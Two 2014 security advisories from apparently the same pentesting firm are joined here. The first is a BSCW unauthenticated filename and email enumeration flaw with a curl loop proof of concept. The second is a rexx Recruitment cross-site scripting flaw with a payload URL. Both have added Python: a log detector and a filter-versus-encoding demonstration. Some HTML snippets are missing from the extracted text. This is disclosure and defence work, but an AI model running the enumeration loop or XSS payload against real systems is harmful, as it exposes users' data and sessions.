(from OrbiTeam's homepage)

More Details
============

BSCW uses the URL parameter "op" to select different functions of the application. For example the password reset dialog can be used by opening the following URL:

https://www.example.com/pub/bscw.cgi/?op=chpwd

The server maps the value provided by the parameter "op" to locally stored Python modules which provide handler functions that are called to generate HTTP responses. It was discovered that sensitive metadata about internally stored objects of BSCW can be disclosed by using the "inf" operation.
When opening the following URL, the filename of a document which is identified by the value "12345" is disclosed in the response sent by the server (output shortened):

$ curl --header 'Cookie: _pub_bscws="e4efb9e7ace7a12de82aa7a4aff1ab2a:1"' \
  "http://www.example.com/pub/bscw.cgi/12345?op=inf"
[...]
Name Contract-X.doc
[...]

The cookie used in the above command is generated by requesting the login page of BSCW. It is not necessary to enter credentials. By iterating over the ids which are assigned in ascending order, attackers can enumerate the names of all objects stored in BSCW without prior authentication. This includes filenames and email addresses.

Proof of Concept
================

When the following loop is run with a valid (but unauthenticated) BSCW cookie, it will find names for the BSCW objects 1 to 3:

$ for id in `seq 1 3`; do
    filename=`curl --silent --header 'Cookie: _pub_bscws="COOKIE_COOKIE_COOKIE"' \
      "http://www.example.com/pub/bscw.cgi/${id}?op=inf" | \
      grep "iValueB" | \
      sed -e 's;^.*\(.*\).*$;\1;'`
    echo "${id}: ${filename}"
  done

Workaround
==========

It may be possible to add another authentication layer, for example HTTP-Authentication, to limit access to this BSCW information disclosure to persons authorized to use BSCW anyway.

Fix
===

Update to version 5.0.8.

Security Risk
=============

The risk is estimated to be medium. This vulnerability does not allow attackers to access files stored in BSCW. They can however retrieve filenames, which may be enough to draw conclusions about the corresponding file contents, and other potentially sensitive data such as email addresses.
Timeline
========

2014-02-20 Vulnerability identified
2014-03-04 Customer approved disclosure to vendor
2014-03-06 CVE number requested and assigned
2014-03-07 Vendor notified
2014-03-10 Vendor acknowledges vulnerability
2014-04-22 Vendor released fixed version
2014-05-08 Advisory released
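Until the update is installed, the ascending-id walk over "op=inf" that the advisory describes is visible in the web server's access log. The following detection is an added example, not part of the advisory or of BSCW: it parses Apache-style combined log lines (the sample lines are constructed) and flags clients that request many consecutive object ids with op=inf inside a short window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Apache-style access log lines (not from the advisory): one
# client walks object ids 1 to 6 with op=inf, another uses BSCW normally.
SAMPLE_LOG = """\
203.0.113.5 - - [22/Apr/2014:10:01:01 +0200] "GET /pub/bscw.cgi/1?op=inf HTTP/1.1" 200 1833 "-" "curl/7.35.0"
203.0.113.5 - - [22/Apr/2014:10:01:02 +0200] "GET /pub/bscw.cgi/2?op=inf HTTP/1.1" 200 1790 "-" "curl/7.35.0"
203.0.113.5 - - [22/Apr/2014:10:01:02 +0200] "GET /pub/bscw.cgi/3?op=inf HTTP/1.1" 200 1802 "-" "curl/7.35.0"
203.0.113.5 - - [22/Apr/2014:10:01:03 +0200] "GET /pub/bscw.cgi/4?op=inf HTTP/1.1" 200 1811 "-" "curl/7.35.0"
203.0.113.5 - - [22/Apr/2014:10:01:04 +0200] "GET /pub/bscw.cgi/5?op=inf HTTP/1.1" 200 1799 "-" "curl/7.35.0"
203.0.113.5 - - [22/Apr/2014:10:01:05 +0200] "GET /pub/bscw.cgi/6?op=inf HTTP/1.1" 200 1825 "-" "curl/7.35.0"
198.51.100.7 - - [22/Apr/2014:10:02:30 +0200] "GET /pub/bscw.cgi/?op=chpwd HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
198.51.100.7 - - [22/Apr/2014:10:03:00 +0200] "GET /pub/bscw.cgi/12345?op=inf HTTP/1.1" 200 1901 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
INF_RE = re.compile(r"^/pub/bscw\.cgi/(?P<id>\d+)\?(?:[^ ]*&)?op=inf(?:&|$)")


def parse_inf_request(line):
    """Return (ip, timestamp, object_id) for a request to the "inf" operation
    on a numeric object id, or None for any other line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    p = INF_RE.match(m["path"])
    if not p:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, int(p["id"])


def find_enumeration(lines, min_ids=5, window=timedelta(minutes=5), min_adjacent_ratio=0.8):
    """Flag clients that fetched at least min_ids distinct object ids via
    op=inf inside one window, where most sorted ids are consecutive (id+1),
    i.e. the ascending-id walk the advisory describes. Returns
    {ip: (distinct_ids, lowest_id, highest_id)}."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_inf_request(line)
        if rec:
            per_ip[rec[0]].append(rec)
    alerts = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r[1])
        for start, first in enumerate(recs):
            ids = sorted({r[2] for r in recs[start:] if r[1] - first[1] <= window})
            if len(ids) < min_ids:
                continue
            adjacent = sum(1 for a, b in zip(ids, ids[1:]) if b - a == 1)
            if adjacent / (len(ids) - 1) >= min_adjacent_ratio:
                alerts[ip] = (len(ids), ids[0], ids[-1])
                break
    return alerts
```

The thresholds are starting points; a single user legitimately opening a few neighbouring objects stays below them, while a scripted walk trips the rule within seconds.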
[FD] [RT-SA-2014-002] rexx Recruitment: Cross-Site Scripting in User Registration
Advisory: rexx Recruitment Cross-Site Scripting in User Registration

RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability in rexx Recruitment's user registration page during a penetration test. If attackers can persuade users to click on a prepared link or redirect them to such a link from an attacker-controlled website, they are able to run arbitrary JavaScript code in the context of the rexx Recruitment installation's domain.

Details
=======

Product: rexx Recruitment
Affected Versions: Releases prior to those fixed on 2014-01-15
Fixed Versions: R6.1 and R7 with fixes from 2014-01-15
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: http://www.rexx-systems.com
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-002
Advisory Status: published
CVE: CVE-2014-1224
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1224

Introduction
============

"rexx Recruitment supports around 3 million application processes each year (data from 2011). This stems from experience in applicant management: from company recruitment in small and medium-sized enterprises and international companies, through to specialised personnel service providers. The rexx Recruitment software supports paper, online and email applications. All information about and communication with the applicant at a glance in the digital applicant file!"
(from rexx systems' homepage)

More Details
============

The rexx Recruitment software includes a user registration where job applicants who want to stay informed about new vacancies can register. The registration site is usually available at the path "/reg", for example at a URL like the following:

http://www.example.com/reg

The website asks for some mandatory data like name and surname as well as postal and email addresses.
If a mandatory entry is missing when submitting the data, the website will present the registration site again to the user, with those input fields pre-populated with the data that was already filled in and error messages for the missing input fields. The pre-populated "first name" field with the name "redteam" would for example look as follows in the HTML source code:

If one now tries to embed control characters like an opening angle bracket in the name, the system filters the input by removing everything after the bracket. The value "red

Proof of Concept
================

The following URL adds a new "onfocus" event handler to the "fname" input field that gets executed as soon as the website is loaded due to the "autofocus" attribute:

http://www.example.com/reg
?fname=redteam"%20onfocusonfocus%3d%3d"alert('RedTeam%20Pentesting')"%20autofocus%3d"autofocus
&continue.x=
&continue.y=

Workaround
==========

If possible, disable user registration and disallow access to the registration website, e.g. by blocking access in the web server.

Fix
===

Update to versions R6.1 or R7 with the fixes from 2014-01-15 included.

Security Risk
=============

The risk of this vulnerability is estimated to be high. Being able to embed arbitrary JavaScript code allows attackers to completely manipulate the website, add their own content and track all user interaction.

Timeline
========

2013-12-04 Vulnerability identified
2013-12-10 Customer approved disclosure to vendor
2013-12-13 Vendor notified
2014-01-15 Vendor released fixed version
2014-02-11 CVE number requested and assigned
2014-03-27 Advisory released
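The advisory describes a filter that strips input from the first angle bracket onward but leaves double quotes alone, which is exactly what lets the "fname" value close the attribute and add an event handler. The following added example (not code from the advisory or from rexx systems) models that filter beside proper attribute encoding and uses Python's HTML parser to show which attributes a browser would actually see; the surrounding <input> markup is an assumption, since the original tag did not survive extraction.

```python
import html
from html.parser import HTMLParser

# Constructed input: the URL-decoded "fname" value from the advisory's proof
# of concept, with the event handler written plainly.
CONSTRUCTED_INPUT = "redteam\" onfocus=\"alert('RedTeam Pentesting')\" autofocus=\"autofocus"


def vendor_style_filter(value):
    """Filter as described in the advisory: everything from the first opening
    angle bracket onward is dropped. Double quotes pass through, so a value
    can still terminate the attribute it is placed in."""
    return value.split("<", 1)[0]


def render_fname_field_filtered(value):
    """Pre-populated field built with the filter alone (markup is assumed)."""
    return '<input type="text" name="fname" value="%s">' % vendor_style_filter(value)


def render_fname_field_encoded(value):
    """Hardened variant: encode for the attribute context, so '"' becomes
    &quot; and the browser keeps the whole input inside the value attribute."""
    return '<input type="text" name="fname" value="%s">' % html.escape(value, quote=True)


class _InputAttributes(HTMLParser):
    """Collects the attributes the browser would see on the <input> element."""

    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs = dict(attrs)


def parsed_input_attributes(markup):
    """Parse a rendered field and return its attribute dictionary (values are
    entity-decoded, as a browser would see them)."""
    parser = _InputAttributes()
    parser.feed(markup)
    return parser.attrs
```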